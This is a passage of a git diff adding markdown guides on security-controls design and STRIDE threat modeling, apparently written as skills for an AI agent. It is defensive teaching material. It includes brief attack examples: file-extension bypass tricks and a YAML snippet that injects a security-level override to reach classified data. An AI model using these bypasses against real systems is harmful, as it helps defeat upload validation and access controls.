(limit damage from compromised token) + - Audit logging (detect unusual access patterns) +5. **Failure logged**: Yes → Log signature validation failures, alert on spike + +**Outcome**: Designed 4 layers of defense against token attacks. + +### Example: File Upload Validation + +**Control**: Check file extension against allowlist + +1. **What attack**: Prevents upload of executable files (.exe, .sh) +2. **How it can fail**: + - Attacker renames malware.exe → malware.jpg + - Double extension: malware.jpg.exe + - Case variation: malware.ExE +3. **What if it fails**: Malicious file stored, potentially executed +4. **Next layers**: + - Layer 2: Magic byte verification (check file content, not name) + - Layer 3: Antivirus scanning (detect known malware) + - Layer 4: File reprocessing (re-encode images, destroying embedded code) + - Layer 5: noexec mount (storage prevents execution) + - Layer 6: Separate domain for user content (CSP prevents XSS) +5. **Failure logged**: Yes → Log validation failures, rejected files + +**Outcome**: Extension check is Layer 1 of 6. If bypassed, 5 more layers prevent exploitation. + +## Quick Reference: Control Selection + +**For every trust boundary, apply this checklist:** + +| Layer | Control Type | Example | +|-------|--------------|---------| +| **1. Validation** | Input checking | Size limits, type validation, sanitization | +| **2. Authentication** | Identity verification | JWT validation, certificate checks, MFA | +| **3. Authorization** | Permission checks | RBAC, resource-level access, least privilege | +| **4. Rate Limiting** | Abuse prevention | Per-user limits, anomaly detection, quotas | +| **5. Audit Logging** | Detective | Security events, tamper-proof logs, alerting | +| **6. Encryption** | Confidentiality | TLS in transit, encryption at rest, key management | + +**For each control:** +- Define fail-secure behavior (what happens if it fails?) +- Apply least privilege (minimum necessary access) +- Verify separation of duties (no single point of complete control) +- Test "what if this fails?" (ensure backup layers exist) + +## Common Mistakes + +### ❌ Designing Controls Before Identifying Boundaries + +**Wrong**: "I need authentication and authorization and rate limiting" + +**Right**: "Where are my trust boundaries? → Internet→API, API→Database → At each: apply layered controls" + +**Why**: Controls are meaningless without knowing WHERE to apply them. + + +### ❌ Single Layer of Defense + +**Wrong**: "Authentication is enough security" + +**Right**: "Authentication + Authorization + Rate Limiting + Audit Logging" + +**Why**: If authentication is bypassed (bug, misconfiguration), other layers provide defense. + + +### ❌ Fail-Open Defaults + +**Wrong**: +```python +try: + user = auth_service.validate(token) +except ServiceUnavailable: + user = AnonymousUser() # Let them through +``` + +**Right**: +```python +try: + user = auth_service.validate(token) +except ServiceUnavailable: + raise Unauthorized("Auth service unavailable") +``` + +**Why**: Control failure should result in secure state (deny), not insecure state (allow). + + +### ❌ Excessive Privileges + +**Wrong**: Grant web application full database access (SELECT, INSERT, UPDATE, DELETE on all tables) + +**Right**: Grant only needed operations per table (SELECT on customers, INSERT-only on audit_logs) + +**Why**: Minimizes damage from compromised application (SQL injection, stolen credentials). + + +### ❌ Single Point of Control + +**Wrong**: One admin account can initiate, approve, and execute critical operations + +**Right**: Separate accounts for initiate vs approve, require multi-signature + +**Why**: Prevents single compromised account from complete system control. + + +### ❌ No Verification of "What If This Fails?" + +**Wrong**: Design controls, assume they work + +**Right**: For each control, ask "how can this fail?" and design backup layers + +**Why**: Controls fail due to bugs, misconfigurations, attacks. Backup layers provide resilience. + +## Cross-References + +**Use BEFORE this skill**: +- `ordis/security-architect/threat-modeling` - Identify threats first, then design controls to address them + +**Use WITH this skill**: +- `muna/technical-writer/documentation-structure` - Document control architecture as ADR + +**Use AFTER this skill**: +- `ordis/security-architect/security-architecture-review` - Review controls for completeness + +## Real-World Impact + +**Well-designed controls using this methodology:** +- Multi-layered API authentication catching token forgery even when signature validation was bypassed (algorithm confusion attack) +- Database access controls limiting SQL injection damage to read-only operations (least privilege prevented data deletion) +- File upload defenses stopping malware despite extension check bypass (magic bytes + antivirus + reprocessing layers) + +**Key lesson**: **Systematic application of defense-in-depth at trust boundaries is more effective than ad-hoc control selection.** diff --git a/skills/using-security-architect/threat-modeling.md b/skills/using-security-architect/threat-modeling.md new file mode 100644 index 0000000..a1bf8a3 --- /dev/null +++ b/skills/using-security-architect/threat-modeling.md @@ -0,0 +1,565 @@ + +# Threat Modeling + +## Overview + +Systematic identification of security threats using proven frameworks. Threat modeling finds threats that intuition misses by applying structured methodologies. + +**Core Principle**: Security intuition finds obvious threats. Systematic threat modeling finds subtle, critical threats that lead to real vulnerabilities. + +## When to Use + +Load this skill when: +- Designing new systems or features (before implementation) +- Adding security-sensitive functionality (auth, data handling, APIs) +- Reviewing existing designs for security gaps +- Investigating security incidents (what else could be exploited?) +- User mentions: "threat model", "security risks", "what could go wrong", "attack surface" + +**Use BEFORE implementation** - threats found after deployment are 10x more expensive to fix. + +## Don't Use For + +- **Implementing specific security controls** (use security-controls-design) +- **Code-level security patterns** (use secure-by-design-patterns) +- **Reviewing existing designs for completeness** (use security-architecture-review) +- **Compliance mapping** (use compliance-awareness-and-mapping) +- **Documenting threats after they're identified** (use documenting-threats-and-controls) + +This skill is for IDENTIFYING threats systematically. Once threats are identified, route to appropriate skills for designing controls, implementing patterns, or documenting decisions. + +## The STRIDE Framework + +**STRIDE** is a systematic threat enumeration framework. Apply to EVERY component, interface, and data flow. + +### S - Spoofing Identity + +**Definition**: Attacker pretends to be someone/something else + +**Questions to Ask**: +- Can attacker claim a different identity? +- Is authentication required? Can it be bypassed? +- Are credentials properly validated? +- Can tokens/sessions be stolen or forged? + +**Example Threats**: +- Stolen authentication tokens +- Forged JWT signatures +- Session hijacking via XSS +- API key leakage in logs + + +### T - Tampering with Data + +**Definition**: Unauthorized modification of data or code + +**Questions to Ask**: +- Can attacker modify data in transit? (MITM) +- Can attacker modify data at rest? (database, files, config) +- Can attacker modify code? (supply chain, config injection) +- **Can configuration override security properties?** (CRITICAL - often missed) + +**Example Threats**: +- Configuration files modifying security_level properties +- YAML/JSON injection overriding access controls +- Database tampering if encryption/MAC missing +- Code injection via deserialization + +**⚠️ Property Override Pattern** (VULN-004): +```yaml +# Plugin declares security_level=UNOFFICIAL in code +# Attacker adds to YAML config: +plugins: + datasource: + security_level: SECRET # OVERRIDES code declaration! +``` + +Always ask: **"Can external configuration override security-critical properties?"** + + +### R - Repudiation + +**Definition**: Attacker denies performing an action (no audit trail) + +**Questions to Ask**: +- Are security-relevant actions logged? +- Can logs be tampered with or deleted? +- Is logging sufficient for forensics? +- Can attacker perform reconnaissance without detection? + +**Example Threats**: +- No logging of failed authorization attempts +- Logs stored without integrity protection (MAC, signatures) +- Insufficient detail for incident response +- Log injection attacks + + +### I - Information Disclosure + +**Definition**: Exposure of information to unauthorized parties + +**Questions to Ask**: +- What data is exposed in responses, logs, errors? +- Can attacker enumerate resources or users? +- Are temporary files, caches, or memory properly cleared? +- Can attacker infer sensitive data from timing/behavior? + +**Example Threats**: +- Secrets in error messages or stack traces +- Timing attacks revealing password validity +- Cache poisoning exposing other users' data +- Path traversal reading arbitrary files + + +### D - Denial of Service + +**Definition**: Making system unavailable or degrading performance + +**Questions to Ask**: +- Are there resource limits (CPU, memory, connections)? +- Can attacker trigger expensive operations? +- Is rate limiting implemented? +- Can attacker cause crashes or hangs? + +**Example Threats**: +- Unbounded recursion or loops +- Memory exhaustion via large payloads +- Algorithmic complexity attacks (e.g., hash collisions) +- Crash via malformed input + + +### E - Elevation of Privilege + +**Definition**: Gaining capabilities beyond what's authorized + +**Questions to Ask**: +- Can attacker access admin functions? +- Can attacker escalate from low to high privilege? +- Are privilege checks performed at every layer? +- **Can type system be bypassed?** (ADR-004 pattern) + +**Example Threats**: +- Missing authorization checks on sensitive endpoints +- Horizontal privilege escalation (access other users' data) +- Vertical privilege escalation (user → admin) +- Duck typing allowing security bypass + + +## Attack Tree Construction + +**Purpose**: Visual/structured representation of attack paths from goal → exploitation + +### Attack Tree Format + +``` +ROOT: Attacker Goal (e.g., "Access classified data") +├─ BRANCH 1: Attack Vector +│ ├─ LEAF: Specific Exploit (with feasibility) +│ └─ LEAF: Alternative Exploit +├─ BRANCH 2: Alternative Vector +│ └─ LEAF: Exploit Method +``` + +### Example: Configuration Override Attack (VULN-004) + +``` +ROOT: Access classified data with insufficient clearance +├─ Override Plugin Security Level +│ ├─ Inject security_level into YAML config ⭐ (VULN-004 - actually happened) +│ ├─ Modify plugin source code (requires code access) +│ └─ Bypass registry to register malicious plugin (ADR-003 gap) +├─ Exploit Trusted Downgrade +│ ├─ Compromise high-clearance component (supply chain) +│ └─ Abuse legitimate downgrade path (ADR-005 gap) +├─ Bypass Type System +│ └─ Duck-type plugin without BasePlugin inheritance (ADR-004 gap) +``` + +**⭐ = Easiest/highest risk path** + +### How to Build Attack Trees + +1. **Start with attacker goal**: What does attacker want? (data access, DoS, privilege escalation) +2. **Branch by attack vector**: How could they achieve it? (config, network, code) +3. **Leaf nodes are specific exploits**: Concrete technical steps +4. **Mark feasibility**: Easy, Medium, Hard (or Low/Med/High effort) +5. **Identify easiest path**: This is your highest priority to mitigate + + +## Enforcement Gap Analysis + +**Pattern**: Security properties must be enforced at EVERY layer. Single-layer enforcement fails. + +### Layers to Check + +**For any security property (e.g., security_level, access control, data classification):** + +1. **Schema/Type Layer**: Is property type-safe? Can it be None/invalid? +2. **Registration Layer**: Is component registered? Can attacker bypass registry? +3. **Construction Layer**: Is property immutable after creation? Can it be modified? +4. **Runtime Layer**: Is property checked before sensitive operations? +5. **Post-Operation Layer**: Is result validated against expected property? + +### Example: MLS Security Level Enforcement (ADR-002 → 005) + +| Layer | Gap Found | Fix Required | +|-------|-----------|--------------| +| **Registry** | Plugin not registered at all (ADR-003) | Central plugin registry with runtime checks | +| **Type System** | Protocol allows duck typing bypass (ADR-004) | ABC with sealed methods, not Protocol | +| **Immutability** | security_level could be mutated (VULN-009) | Frozen dataclass + runtime checks | +| **Trust** | Trusted downgrade assumes no compromise (ADR-005) | Strict mode disables trusted downgrade | + +**Key Insight**: Each gap was found AFTER implementation. Systematic enforcement gap analysis would have caught all four upfront. + +### How to Apply + +For each security property: +1. **List all layers** where property matters +2. **Ask per layer**: "Can attacker bypass this layer?" +3. **Design defense-in-depth**: Redundant checks at multiple layers + + +## Risk Scoring + +**Purpose**: Prioritize threats by (Likelihood × Impact) + +### Likelihood Scale + +| Score | Likelihood | Criteria | +|-------|-----------|----------| +| **3** | High | Easy to exploit, attacker has means and motive, no special access needed | +| **2** | Medium | Requires some skill or access, exploit path exists but not trivial | +| **1** | Low | Requires significant expertise, insider access, or rare conditions | + +### Impact Scale + +| Score | Impact | Criteria | +|-------|--------|----------| +| **3** | High | Complete system compromise, data breach, financial loss, safety risk | +| **2** | Medium | Partial compromise, limited data exposure, service degradation | +| **1** | Low | Minor information leakage, temporary DoS, limited scope | + +### Risk Matrix + +``` + IMPACT + 1 2 3 + ┌───┬───┬───┐ + 3 │ M │ H │ C │ C = Critical (fix immediately) +L 2 │ L │ M │ H │ H = High (fix before launch) +I 1 │ L │ L │ M │ M = Medium (fix soon) +K └───┴───┴───┘ L = Low (fix if time permits) +``` + +### Example: VULN-004 Config Override + +- **Likelihood**: 3 (High) - YAML files easily modified with filesystem access +- **Impact**: 3 (High) - Bypass MLS enforcement, access classified data +- **Risk Score**: 9 (Critical) - **Fix immediately** + +### Example: ADR-004 Type System Bypass + +- **Likelihood**: 2 (Medium) - Requires knowing to create duck-typed plugin +- **Impact**: 3 (High) - Complete security bypass +- **Risk Score**: 6 (High) - **Fix before launch** + + +## Threat Modeling Workflow + +### Step 1: System Decomposition + +Break system into components: +1. **Entry points**: APIs, file uploads, configuration, user input +2. **Data stores**: Databases, caches, logs, files +3. **External dependencies**: Third-party APIs, libraries, services +4. **Trust boundaries**: Where privilege level changes, network boundaries +5. **Security-critical components**: Auth, access control, crypto, secrets management + + +### Step 2: Apply STRIDE per Component + +For EACH component/interface, systematically ask STRIDE questions: + +**Example: Plugin Configuration Component** + +| STRIDE | Threat Found | Priority | +|--------|-------------|----------| +| **S** | None (no identity claims) | - | +| **T** | Config tampering to override security_level (VULN-004) | Critical | +| **R** | Config changes not logged | Medium | +| **I** | Config may contain secrets in plaintext | High | +| **D** | Malformed YAML causes parser crash | Low | +| **E** | Config override elevates plugin privilege | Critical | + + +### Step 3: Build Attack Trees + +For each high-priority threat, construct attack tree: +- Goal: What does attacker want? +- Vectors: How could they get it? +- Exploits: Specific technical steps + +Mark easiest paths with ⭐. + + +### Step 4: Check Enforcement Gaps + +For each security property (authentication, authorization, encryption): +1. List enforcement layers (schema, registry, runtime, etc.) +2. Check each layer for gaps +3. Design redundant checks (defense-in-depth) + + +### Step 5: Score and Prioritize + +- Calculate Likelihood × Impact for each threat +- Sort by risk score (highest first) +- Set mitigation deadlines (Critical → immediate, High → before launch) + + +### Step 6: Document Threats + +Create threat model document: +```markdown +# Threat Model: [System Name] + +## Scope +[Components, entry points, trust boundaries] + +## Threats Identified + +### THREAT-001: Configuration Override Attack (CRITICAL) +**STRIDE**: Tampering, Elevation of Privilege +**Attack Tree**: [Include tree diagram or text description] +**Risk Score**: 9 (L:3 × I:3) +**Mitigation**: Forbid security_level in config (schema), runtime verification, frozen dataclass + +### THREAT-002: [Next threat...] + +## Enforcement Gaps +[List gaps found in defense-in-depth analysis] + +## Risk Matrix +[Include prioritized threat list] +``` + + +## Common Patterns That Intuition Misses + +### Pattern 1: Property Override via Configuration + +**Symptom**: Security property declared in code, but configuration system allows overriding it + +**Example**: VULN-004 - Plugin declares security_level in code, YAML config overrides it + +**How to Spot**: +- Code declares security property (access_level, security_level, role) +- Configuration system loads external data (YAML, JSON, database) +- No explicit check that config cannot override security properties + +**Mitigation**: Schema MUST forbid security properties in config, runtime verification + + +### Pattern 2: Enforcement at One Layer Only + +**Symptom**: Security check at one layer, but attacker can bypass that layer + +**Example**: ADR-003 - MLS checks assume plugin is registered, but no check that plugin IS registered + +**How to Spot**: +- Security check at schema/type layer but not runtime +- Trust in single source of truth (registry, type system) without verification +- No redundant checks + +**Mitigation**: Defense-in-depth - check at schema, registry, runtime, post-operation + + +### Pattern 3: Type System as Security Boundary + +**Symptom**: Relying on type system (Protocol, interface) for security enforcement + +**Example**: ADR-004 - Protocol typing allows duck typing to bypass BasePlugin + +**How to Spot**: +- Security property defined in Protocol or interface +- No nominal type enforcement (isinstance check, ABC) +- Runtime doesn't verify actual type, just duck typing compatibility + +**Mitigation**: Use ABC with sealed methods, runtime isinstance checks + + +### Pattern 4: Trusted Component Assumptions + +**Symptom**: Assuming high-privilege component will never be compromised + +**Example**: ADR-005 - Trusted downgrade assumes high-clearance component is always safe + +**How to Spot**: +- Component granted special privileges ("trusted") +- No monitoring or verification of trusted component behavior +- Insider threat or supply chain compromise not in threat model + +**Mitigation**: Trust but verify - log all actions, anomaly detection, strict mode without trust + + +### Pattern 5: Immutability Assumption + +**Symptom**: Assuming language feature (frozen, const, final) provides security + +**Example**: VULN-009 - Frozen dataclass but __dict__ bypass possible + +**How to Spot**: +- Security property marked frozen/immutable via language feature +- No runtime check that property hasn't changed +- Language feature has known bypasses (__dict__, __setattr__) + +**Mitigation**: Language feature + runtime verification + test all bypass methods + + +## Quick Reference Checklist + +**Use this checklist for every threat modeling session:** + +### Pre-Session +- [ ] Identify scope (components, entry points, trust boundaries) +- [ ] Gather architecture diagrams, API specs, data flow diagrams + +### STRIDE Application +- [ ] Apply S.T.R.I.D.E to EVERY component/interface +- [ ] Document threats found per category +- [ ] Check for property override patterns +- [ ] Check for enforcement gap patterns + +### Attack Trees +- [ ] Build attack tree for each high-priority threat +- [ ] Mark easiest exploitation paths +- [ ] Identify pre-requisites (what attacker needs) + +### Risk Scoring +- [ ] Score Likelihood (1-3) for each threat +- [ ] Score Impact (1-3) for each threat +- [ ] Calculate Risk = L × I +- [ ] Prioritize by risk score + +### Enforcement Gaps +- [ ] List security properties (auth, authorization, encryption, etc.) +- [ ] For each property, check: Schema? Registry? Runtime? Post-op? +- [ ] Identify gaps in defense-in-depth + +### Documentation +- [ ] Create threat model document +- [ ] Include attack trees, risk matrix, mitigation plans +- [ ] Share with team for review + + +## Common Mistakes + +### ❌ Intuitive Threat Finding Only +**Wrong**: "I'll just think about what could go wrong" +**Right**: Systematically apply STRIDE to every component + +**Why**: Intuition finds obvious threats. STRIDE finds subtle, critical threats like VULN-004. + +### ❌ Threat Modeling After Implementation +**Wrong**: "Let's build it first, then threat model" +**Right**: Threat model BEFORE implementation + +**Why**: Threats found post-implementation require expensive re-architecture. Threats found in design are cheap to fix. + +### ❌ Single-Layer Validation +**Wrong**: "Schema validates config, so it's secure" +**Right**: Validate at schema, registry, runtime, post-operation + +**Why**: Attackers bypass single layers. Defense-in-depth catches them. + +### ❌ Trusting Language Features for Security +**Wrong**: "It's frozen=True, so it can't be modified" +**Right**: Language feature + runtime verification + test bypass methods + +**Why**: Language features have bypasses (VULN-009). Always verify. + +### ❌ Skipping Risk Scoring +**Wrong**: "All threats are important, fix them all" +**Right**: Score L×I, prioritize Critical/High, fix Low only if time permits + +**Why**: Resources are limited. Critical threats must be fixed first. + + +## Real-World Examples + +### Example 1: VULN-004 - Configuration Override Attack + +**System**: Plugin system with YAML configuration and MLS security levels + +**STRIDE Analysis**: +- **T** (Tampering): Config file tampering ✓ +- **E** (Elevation): Override security_level property ✓ **← Caught by STRIDE** + +**Attack Tree**: +``` +Goal: Access classified data +└─ Override security_level to SECRET + ├─ Inject security_level: SECRET into YAML ⭐ (easiest) + ├─ Modify source code (harder) + └─ Compromise plugin registry (harder) +``` + +**Risk Score**: L:3 × I:3 = 9 (Critical) + +**Mitigation**: Forbid security_level in config schema + runtime verification + + +### Example 2: ADR-002 → 005 - MLS Design Gaps + +**System**: Multi-Level Security enforcement for plugins + +**Enforcement Gap Analysis**: +1. **Registry Layer**: No check plugin is registered (ADR-003) ✓ +2. **Type Layer**: Protocol allows duck typing (ADR-004) ✓ +3. **Immutability**: security_level could be mutated (VULN-009) ✓ +4. **Trust**: Trusted downgrade assumes no compromise (ADR-005) ✓ + +**All four gaps found by systematic enforcement analysis** - would have prevented 3 follow-up ADRs. + +**Risk Scores**: +- ADR-003 (registry): L:2 × I:3 = 6 (High) +- ADR-004 (type): L:2 × I:3 = 6 (High) +- ADR-005 (trust): L:1 × I:3 = 3 (Medium) + + +## When NOT to Threat Model + +**Don't threat model for**: +- Non-security features (UI styling, analytics dashboards with no sensitive data) +- Changes that don't touch attack surface (refactoring internal code, renaming variables) +- Systems with no sensitive data and no attack value (internal dev tools, prototypes) + +**Quick test**: If attacker can't gain anything (data, money, access, disruption), threat modeling may be overkill. + + +## Cross-References + +### Load These Skills Together + +**For comprehensive security**: +- `ordis/security-architect/threat-modeling` (this skill) - Find threats +- `ordis/security-architect/security-controls-design` - Design mitigations +- `ordis/security-architect/secure-by-design-patterns` - Prevent threats at architecture level + +**For documentation**: +- `ordis/security-architect/documenting-threats-and-controls` - Document threat model +- `muna/technical-writer/documentation-structure` - Structure threat docs as ADRs + + +## Summary + +**Threat modeling IS systematic threat discovery using STRIDE, attack trees, and risk scoring.** + +**Key Principles**: +1. **STRIDE every component** - systematic beats intuition +2. **Build attack trees** - find easiest exploitation paths +3. **Check enforcement gaps** - defense-in-depth at every layer +4. **Score risks** - L × I prioritization +5. **Do it early** - before implementation, when fixes are cheap + +**Meta-rule**: If you're designing something security-sensitive and you haven't threat modeled it, you've missed critical threats. Always threat model first.